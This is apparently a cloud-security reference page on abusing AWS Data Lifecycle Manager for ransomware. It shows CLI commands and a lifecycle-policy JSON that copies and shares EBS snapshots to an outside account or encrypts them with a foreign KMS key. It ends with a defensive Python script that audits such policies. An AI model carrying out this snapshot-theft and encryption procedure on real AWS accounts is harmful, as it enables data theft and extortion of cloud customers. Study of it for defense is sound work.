AWS - DLM Post Exploitation
Data Lifecycle Manager (DLM)
EC2:DescribeVolumes, DLM:CreateLifeCyclePolicy
A ransomware attack can be carried out by encrypting as many EBS volumes as possible and then deleting the existing EC2 instances, EBS volumes, and snapshots. To automate this destructive activity, one can use Amazon DLM, encrypting the snapshots with a KMS key from another AWS account and transferring the encrypted snapshots to a different account. Alternatively, they can transfer the snapshots unencrypted to an account they control and encrypt them there. Although it is not straightforward to encrypt existing EBS volumes or snapshots directly, it is possible to do so by creating a new volume or snapshot.
First, one would use a command to gather information about the volumes, such as instance ID, volume ID, encryption status, attachment status, and volume type.
aws ec2 describe-volumes
Second, one would create the lifecycle policy. This command uses the DLM API to configure a lifecycle policy that takes daily snapshots of the specified volumes at a set time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file describes the details of the lifecycle policy, such as the target tags, the schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs.
aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
A template for the policy document can be seen here:
{
  "PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
  "ResourceTypes": [
    "VOLUME"
  ],
  "TargetTags": [
    {
      "Key": "ExampleKey",
      "Value": "ExampleValue"
    }
  ],
  "Schedules": [
    {
      "Name": "DailySnapshots",
      "CopyTags": true,
      "TagsToAdd": [
        {
          "Key": "SnapshotCreator",
          "Value": "DLM"
        }
      ],
      "VariableTags": [
        {
          "Key": "CostCenter",
          "Value": "Finance"
        }
      ],
      "CreateRule": {
        "Interval": 24,
        "IntervalUnit": "HOURS",
        "Times": [
          "03:00"
        ]
      },
      "RetainRule": {
        "Count": 14
      },
      "FastRestoreRule": {
        "Count": 2,
        "Interval": 12,
        "IntervalUnit": "HOURS"
      },
      "CrossRegionCopyRules": [
        {
          "TargetRegion": "us-west-2",
          "Encrypted": true,
          "CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
          "CopyTags": true,
          "RetainRule": {
            "Interval": 1,
            "IntervalUnit": "DAYS"
          }
        }
      ],
      "ShareRules": [
        {
          "TargetAccounts": [
            "123456789012"
          ],
          "UnshareInterval": 30,
          "UnshareIntervalUnit": "DAYS"
        }
      ]
    }
  ],
  "Parameters": {
    "ExcludeBootVolume": false
  }
}
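Because the KMS key ARN and the share target account are part of the policy document, a defender can review DLM policies for exactly those two fields. The following is an added example, not code from the original page: it audits a document in the policyDetails.json format shown above and flags share targets and KMS keys outside the organisation's accounts. The function names, the `own_account` and `trusted_accounts` parameters, and the account IDs in the sample are assumptions constructed for illustration.

```python
import json

# Constructed sample in the policyDetails.json format shown above.
SAMPLE_POLICY = json.loads("""
{
  "PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
  "ResourceTypes": ["VOLUME"],
  "TargetTags": [{"Key": "ExampleKey", "Value": "ExampleValue"}],
  "Schedules": [{
    "Name": "DailySnapshots",
    "CrossRegionCopyRules": [{
      "TargetRegion": "us-west-2",
      "Encrypted": true,
      "CmkArn": "arn:aws:kms:us-west-2:999999999999:key/constructed-key-id"
    }],
    "ShareRules": [{"TargetAccounts": ["999999999999", "111111111111"]}]
  }]
}
""")


def arn_account(arn):
    """Return the account ID field of an ARN, or None if it is not a full ARN."""
    parts = arn.split(":", 5)
    return parts[4] if len(parts) == 6 and parts[0] == "arn" else None


def audit_policy_details(policy, own_account, trusted_accounts=()):
    """List schedule settings that share or encrypt snapshots outside trusted accounts."""
    allowed = {own_account, *trusted_accounts}
    findings = []
    for sched in policy.get("Schedules", []):
        name = sched.get("Name", "<unnamed>")
        for rule in sched.get("ShareRules", []):
            for acct in rule.get("TargetAccounts", []):
                if acct not in allowed:
                    findings.append(f"{name}: snapshots shared with external account {acct}")
        for rule in sched.get("CrossRegionCopyRules", []):
            cmk = rule.get("CmkArn")
            # A key ARN that cannot be parsed is reported as well.
            if cmk and arn_account(cmk) not in allowed:
                findings.append(f"{name}: copy encrypted with KMS key not in a trusted account: {cmk}")
    return findings


if __name__ == "__main__":
    for finding in audit_policy_details(SAMPLE_POLICY, own_account="111111111111"):
        print(finding)
```
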